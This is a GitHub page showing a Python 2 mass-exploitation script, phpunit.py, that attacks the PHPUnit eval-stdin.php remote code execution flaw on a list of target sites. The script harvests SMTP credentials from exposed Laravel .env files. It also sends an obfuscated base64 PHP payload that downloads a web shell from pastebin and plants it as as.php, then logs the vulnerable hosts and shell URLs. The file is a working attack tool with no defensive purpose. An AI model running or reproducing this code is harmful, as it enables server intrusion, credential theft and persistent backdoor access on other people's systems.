forked from nanduttgans/smtp-cracknew
-
Notifications
You must be signed in to change notification settings - Fork 0
/
phpunit.py
162 lines (155 loc) · 7.97 KB
/
phpunit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
# -*- coding: utf-8 -*-
banner = """
RpQ#AdM
EQ#d@F Xe Q
MgKG eeeXX eW
BNKGXeeX eW BEpqNg#mbAAAAbm#WQpB
RNDUeeX XFDPU eeeeeeeeeeeeeeeee U@ANB
MAFeeX XeU@dKKKdD@GU XeXX XXeeUW
qDXeX XUN RBMNmK@F UeA
M8Xe XFp M XM
RKXe XM R be e#
qFe eb p Xe#
#XX XFR BGX eFQ
be eb EPX e AB
me XXXXXXXX p NUX eXDM
NX XXeeeeXX UFGPPGG @ pdXXXee dM R R
BFX X G@dbgNqpEBR RBE RQDXee F8mE EdGE Rdp
beXeXX XFp pgD TXPAWMR Bb XeA dFR
BXXPbqdX XM R pgDFXXPbQB pbUeX X@ gTm
qbM 8X XFWKPUDR pgDUX PbQB BWD eX X8 geFB
me eeX Tb pWdFeXPbQB BpQm8Uee eb beXQ
RGX eD BNKP Te8WB BqgA8GU eeeX XM PXem
BU em p#8UeXeXKp Mm8UXeeXXX eD ge em
De eG pm@ eXX XPM EmPXeXX M N eW
BKUeeeeeXdEN8 eX e8R RbUeX U em BKXX XUB
BQgmmNpWPeX XFB R8eXXXeeeeeeeeeXX e@R QFe XeW
p@eX eK QTXUPDAb#ggg#bK8G ee XUp gXX XUN
R QXe XK BgqB REqAU X XN Ne XPB
RFX Ue N RRRRRRR RND eXG eF#R FX p
E XK#GeUKNB RpgD TTUKq MKUTFK E
E eXXX XW pm@UUGDbgNqqqQW#K@UeTeGKNB BgFe eD
RGe8qQGeX eb RMWA8PGFU UFPdmQp R R 8X ePp
qQ RmUeX e@q RBBR MgM EU XeUKp
BbUeX XXDQ BQKGDM RFX XeUbE
B#PXeX XXGKNpR BpQ#KPXe@Q #TXeUbB
qKFXeX XeX FP8ddKdD@PF eTT KM #FmB
RQAPUXeeeeeeeeeeeeeeXFdNR
EQ#A8PGFFFFG@DbWMR
RBBBRR
./Xi4u7 - idiot people
"""
import requests, re, sys, threading
from time import sleep
from urlparse import urlparse
requests.packages.urllib3.disable_warnings()
import threading, time, random
from Queue import Queue
from threading import *
screenlock = Semaphore(value=1)
vuln = 0
bad = 0
shel = 0
smtp = 0
def get_smtp(url):
global smtp
fin = url.replace("/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/.env")
try:
spawn = requests.get(fin, timeout=15, verify=False).text
if "MAIL_HOST" in spawn and "MAIL_USERNAME" in spawn:
host = re.findall("\nMAIL_HOST=(.*?)\n", spawn)[0]
port = re.findall("\nMAIL_PORT=(.*?)\n", spawn)[0]
user = re.findall("\nMAIL_USERNAME=(.*?)\n", spawn)[0]
pasw = re.findall("\nMAIL_PASSWORD=(.*?)\n", spawn)[0]
if user == "null" or pasw == "null" or user == "" or pasw == "":
pass
if "mailtrap" in user:
pass
else:
screenlock.acquire()
print("\033[44m -- SMTP -- \033[0m "+fin)
smtp = smtp + 1
file = open("smtp.txt","a")
geturl = fin.replace(".env","")
pack = geturl+"|"+host+"|"+port+"|"+user+"|"+pasw
file.write(pack+"\n")
file.close()
screenlock.release()
except KeyboardInterrupt:
print("Closed")
exit()
except:
pass
def exploit(url):
get_smtp(url)
global vuln
global bad
global shel
try:
data = "<?php phpinfo(); ?>"
text = requests.get(url, data=data, timeout=15, verify=False)
if "phpinfo" in text.text:
screenlock.acquire()
print("\033[42;1m -- VULN -- \033[0m "+url)
screenlock.release()
vuln = vuln + 1
wre = open("vulnerable.txt", "a")
wre.write(url+"\n")
wre.close()
data2 = "<?php eval('?>'.base64_decode('PD9waHANCmZ1bmN0aW9uIGFkbWluZXIoJHVybCwgJGlzaSkgew0KCSRmcCA9IGZvcGVuKCRpc2ksICJ3Iik7DQoJJGNoID0gY3VybF9pbml0KCk7DQoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgJHVybCk7DQoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0JJTkFSWVRSQU5TRkVSLCB0cnVlKTsNCgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOw0KCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOw0KCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GSUxFLCAkZnApOw0KCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsNCgljdXJsX2Nsb3NlKCRjaCk7DQoJZmNsb3NlKCRmcCk7DQoJb2JfZmx1c2goKTsNCglmbHVzaCgpOw0KfQ0KaWYoYWRtaW5lcigiaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzJSdld0ZVdCIiwiYXMucGhwIikpIHsNCgllY2hvICJTdWtzZXMiOw0KfSBlbHNlIHsNCgllY2hvICJmYWlsIjsNCn0NCj8+')); ?>"
spawn = requests.get(url, data=data2, timeout=15, verify=False)
if "Sukses" in spawn.text:
screenlock.acquire()
print(" \033[42;1m | \033[0m Shell Spawned")
screenlock.release()
shel = shel + 1
wrs = open("shells.txt", "a")
pathshell = url.replace("eval-stdin.php","as.php")
wrs.write(pathshell+"\n")
wrs.close()
else:
screenlock.acquire()
print(" \033[41;1m | \033[0m Fail Spawn Shell")
screenlock.release()
else:
screenlock.acquire()
print("\033[41;1m -- BAAD -- \033[0m "+url)
screenlock.release()
bad = bad + 1
except KeyboardInterrupt:
print("Closed")
exit()
except Exception as err:
screenlock.acquire()
print("\033[43;1m -- ERRN -- \033[0m "+url)
screenlock.release()
bad = bad + 1
try:
list = sys.argv[1]
except:
print "\033[31;1m"+banner+"\033[0m"
print("\n\n# python2.7 l-evil.py list.txt")
exit()
asu = open(list).read().splitlines()
jobs = Queue()
def do_stuff(q):
while not q.empty():
i = q.get()
exp = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
if i.startswith("http"):
url = i+exp
exploit(url)
else:
url = "https://"+i+exp
exploit(url)
q.task_done()
for trgt in asu:
jobs.put(trgt)
for i in range(30): # Default 10 Thread Ganti Aja Kalau Mau
worker = threading.Thread(target=do_stuff, args=(jobs,))
worker.start()
jobs.join()
print("\033[44mSMTP : \033[0m "+str(smtp))
print("\033[42;1mSpawned Shell : \033[0m "+str(shel))
print("\033[43;1mExploited : \033[0m "+str(vuln))
print("\033[41;1mNot Vulnerable : \033[0m "+str(bad))